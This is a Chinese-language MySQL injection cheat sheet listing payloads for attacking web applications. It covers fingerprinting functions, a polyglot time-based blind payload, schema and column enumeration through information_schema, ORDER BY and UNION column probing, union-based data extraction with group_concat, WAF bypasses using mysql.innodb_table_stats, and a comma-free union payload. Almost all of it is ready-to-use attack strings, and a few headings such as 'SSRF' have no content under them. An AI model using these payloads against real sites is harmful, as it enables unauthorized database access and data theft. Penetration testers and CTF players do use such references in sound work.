注释

  1. -- MYSQL Comment
  2. # MYSQL Comment
  3. /* MYSQL Comment */
  4. /*! MYSQL Special SQL */
  5. /*!32302 10*/ Comment for MySQL version 3.23.02

函数

确认 Mysql

  1. concat('a','b')    # 连接两个字符串返回 ab
  2. database()    # 查看数据库
  3. version()    # 版本
  4. user()    # 当前用户
  5. system_user()    # 系统用户
  6. @@version    # 版本
  7. @@datadir    
  8. rand()
  9. floor(2.9)
  10. length(1)
  11. count(1)

一些函数

  1. SELECT hex(database())
  2. SELECT conv(hex(database()),16,10) # Hexadecimal -> Decimal
  3. SELECT DECODE(ENCODE('cleartext', 'PWD'), 'PWD')# Encode() & decpde() returns only numbers
  4. SELECT uncompress(compress(database())) #Compress & uncompress() returns only numbers
  5. SELECT replace(database(),"r","R")
  6. SELECT substr(database(),1,1)='r'
  7. SELECT substring(database(),1,1)=0x72
  8. SELECT ascii(substring(database(),1,1))=114
  9. SELECT database()=char(114,101,120,116,101,115,116,101,114)
  10. SELECT group_concat(<COLUMN>) FROM <TABLE>
  11. SELECT group_concat(if(strcmp(table_schema,database()),table_name,null))
  12. SELECT group_concat(CASE(table_schema)When(database())Then(table_name)END)
  13. strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep()

All 注入

文章: https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/

解释: 这是一种综合的利用方法,它可以让我们的页面返回延迟到1秒左右

  1. SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"

Flow

在一些新版本中我们可以将 information_schema.tables替换为 mysql.innodb_table_stats这可以帮助我们绕过 WAF

  1. SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
  2. SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
  3. SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; #Get values
  4. SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges

Only 1 value

  • group_concat()
  • Limit X,1

Blind one by one

  • substr(version(),X,1)=’r’ or substring(version(),X,1)=0x70 or ascii(substr(version(),X,1))=112
  • mid(version(),X,1)=’5’

盲注

  • LPAD(version(),1…lenght(version()),’1’)=’asd’…
  • RPAD(version(),1…lenght(version()),’1’)=’asd’…
  • SELECT RIGHT(version(),1…lenght(version()))=’asd’…
  • SELECT LEFT(version(),1…lenght(version()))=’asd’…
  • SELECT INSTR(‘foobarbar’, ‘fo…’)=1

检测列数

  1. order by 1
  2. order by 2
  3. order by 3
  4. ...
  5. order by XXX
  7. UniOn SeLect 1
  8. UniOn SeLect 1,2
  9. UniOn SeLect 1,2,3
  10. ...

基于 Mysql 联合

  1. UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
  2. UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
  3. UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
  4. UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...

SSRF

WAF 绕过技巧

Information_schema 备选方案

可以将information_schema.tables替换为mysql.innodb_table_stats sys.x$schema_flattened_keyssys.schema_table_statistics

MYSQL 注入 - 图1

MYSQL 注入 - 图2

没有注释的 MYSQL 注入

https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma

  1. -1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#